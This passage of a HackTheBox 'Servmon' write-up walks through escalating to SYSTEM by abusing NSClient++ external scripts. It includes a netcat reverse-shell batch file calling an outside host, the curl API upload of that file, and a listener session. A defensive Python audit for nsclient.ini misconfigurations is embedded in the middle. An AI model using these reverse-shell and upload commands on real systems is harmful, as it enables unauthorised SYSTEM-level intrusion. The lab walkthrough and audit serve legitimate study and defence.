IppSec explains in his video that the Key and Value fields are basically a new key/value pair for each entry under external scripts. For example, in the default script we see these blank fields
Adding key=command, value=C:\path\to\evil.bat results in a new field with command=C:\path\to\evil.bat
Once done it is necessary to reload the NSClient service. One can do it with the Web GUI or cmd:
nadine@SERVMON C:\Users\Nadine\Downloads>sc stop nscp

SERVICE_NAME: nscp
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x2
        WAIT_HINT          : 0x0

nadine@SERVMON C:\Users\Nadine\Downloads>sc query nscp

SERVICE_NAME: nscp
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

nadine@SERVMON C:\Users\Nadine\Downloads>sc start nscp

SERVICE_NAME: nscp
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x1
        WAIT_HINT          : 0xbb8
        PID                : 6324
        FLAGS              :
Strangely, when I attempted to restart/stop the service the way the documentation intended, it didn't work:
nadine@SERVMON C:\Program Files\NSClient++>nscp service --stop
ERROR: Service failed to stop: OpenSCManager failed: 5: Access is denied.
nadine@SERVMON C:\Program Files\NSClient++>nscp service --restart
ERROR: Service failed to stop: OpenSCManager failed: 5: Access is denied.
ERROR: Service failed to start: OpenSCManager failed: 5: Access is denied.
Hopefully the service will not hang when restarted. When done, go to Queries and you'll see that your script is there (default may not be present); click on it, then go to the Run tab.
When you run it, you'll get a SYSTEM shell if you have a listener up and running:
root@Kali:~/HTB/Servmon# rlwrap -r nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.27] from (UNKNOWN) [10.10.10.184] 54975
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami & ipconfig
whoami & ipconfig
nt authority\system

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::f00a:6ae5:a0c:f944
   Temporary IPv6 Address. . . . . . : dead:beef::519b:a6b9:e1fd:4b16
   Link-local IPv6 Address . . . . . : fe80::f00a:6ae5:a0c:f944%3
   IPv4 Address. . . . . . . . . . . : 10.10.10.184
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:9078%3
                                       10.10.10.2

C:\Program Files\NSClient++>
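Looking at the chain above from the defender's side, three things in nsclient.ini made it work: the web password sitting in cleartext in a file the NVMS-1000 traversal could read, an allowed hosts list of 127.0.0.1 that a user with SSH access walks around with a remote port forward, and an external script pointing into a user-writable profile directory that the service then runs as SYSTEM. As an added example (not from the write-up and not NSClient++'s own tooling), this small Python audit flags each of those in a config file. The section and key names are assumed from the NSClient++ documentation and should be checked against the installed version; the sample files are constructed.

```python
import configparser

# Constructed nsclient.ini excerpt modelled on the keys quoted in the write-up
# (password, allowed hosts). Section names are assumed from the NSClient++ docs.
SAMPLE_INI = """
[/settings/WEB/server]
port = 8443
; Undocumented key
password = constructed-example-password
; Undocumented key
allowed hosts = 127.0.0.1

[/settings/external scripts]
allow arguments = true

[/settings/external scripts/scripts]
check_disk = scripts\\check_disk.bat
evil = C:\\Users\\Nadine\\Downloads\\evil.bat
"""

# The same file after the obvious fixes (constructed): the monitoring server's
# address instead of loopback, no argument passing, no script outside the
# install directory. The cleartext password remains and is still reported.
HARDENED_INI = """
[/settings/WEB/server]
port = 8443
password = constructed-example-password
allowed hosts = 10.10.10.250

[/settings/external scripts]
allow arguments = false

[/settings/external scripts/scripts]
check_disk = scripts\\check_disk.bat
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}
USER_PROFILE_PREFIXES = ("c:\\users\\", "c:/users/")


def audit_nsclient_ini(text: str):
    """Return a list of (code, detail) findings for an nsclient.ini body."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    findings = []

    web_section = "/settings/WEB/server"
    web = cp[web_section] if cp.has_section(web_section) else {}
    if web.get("password"):
        findings.append(("WEB-PASSWORD-CLEARTEXT",
                         "web admin password stored in cleartext; restrict the file ACL, since any "
                         "file-read bug on the host (here the NVMS-1000 traversal) exposes it"))
    hosts = [h.strip().lower() for h in web.get("allowed hosts", "").split(",") if h.strip()]
    if hosts and set(hosts) <= LOOPBACK:
        findings.append(("ALLOWED-HOSTS-LOOPBACK-ONLY",
                         "allow-list is loopback only; every local user can reach it, and an SSH "
                         "remote port forward (ssh -R) makes a remote client look local too"))

    ext = "/settings/external scripts"
    if cp.has_section(ext) and cp[ext].getboolean("allow arguments", fallback=False):
        findings.append(("EXT-SCRIPTS-ARGUMENTS",
                         "external scripts accept caller-supplied arguments"))

    scripts = "/settings/external scripts/scripts"
    if cp.has_section(scripts):
        for name, command in cp.items(scripts):
            # A script under a user profile is writable by that user and runs as SYSTEM.
            exe = command.strip().strip('"').lower()
            if exe.startswith(USER_PROFILE_PREFIXES):
                findings.append(("EXT-SCRIPT-IN-USER-PROFILE",
                                 f"{name} runs {command} as SYSTEM from a user-writable location"))
    return findings


if __name__ == "__main__":
    for label, ini in (("sample", SAMPLE_INI), ("hardened", HARDENED_INI)):
        print(f"--- {label} ---")
        for code, detail in audit_nsclient_ini(ini):
            print(f"{code}: {detail}")
```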
Upload evil.bat via API
If you find the above too confusing (because the Web GUI sucks), you're not alone. The upload can be done with the API calls. I did it this way:
root@Kali:~/HTB/Servmon# cat evil.bat
@echo off
C:\Users\Nadine\Downloads\nc.exe 10.10.14.40 443 -e cmd.exe
root@Kali:~/HTB/Servmon# curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/evil.bat --data-binary @evil.bat
Enter host password for user 'admin':
Added evil as scripts\evil.bat
Unfortunately I couldn't find a way to trigger the script via the API, even though there's a command execute API, so here you have to log in and you'll see this in Queries
I didn't have to add it to the scheduler or anything; clicking Queries should run the .bat file, and if not, clicking its entry under Queries should.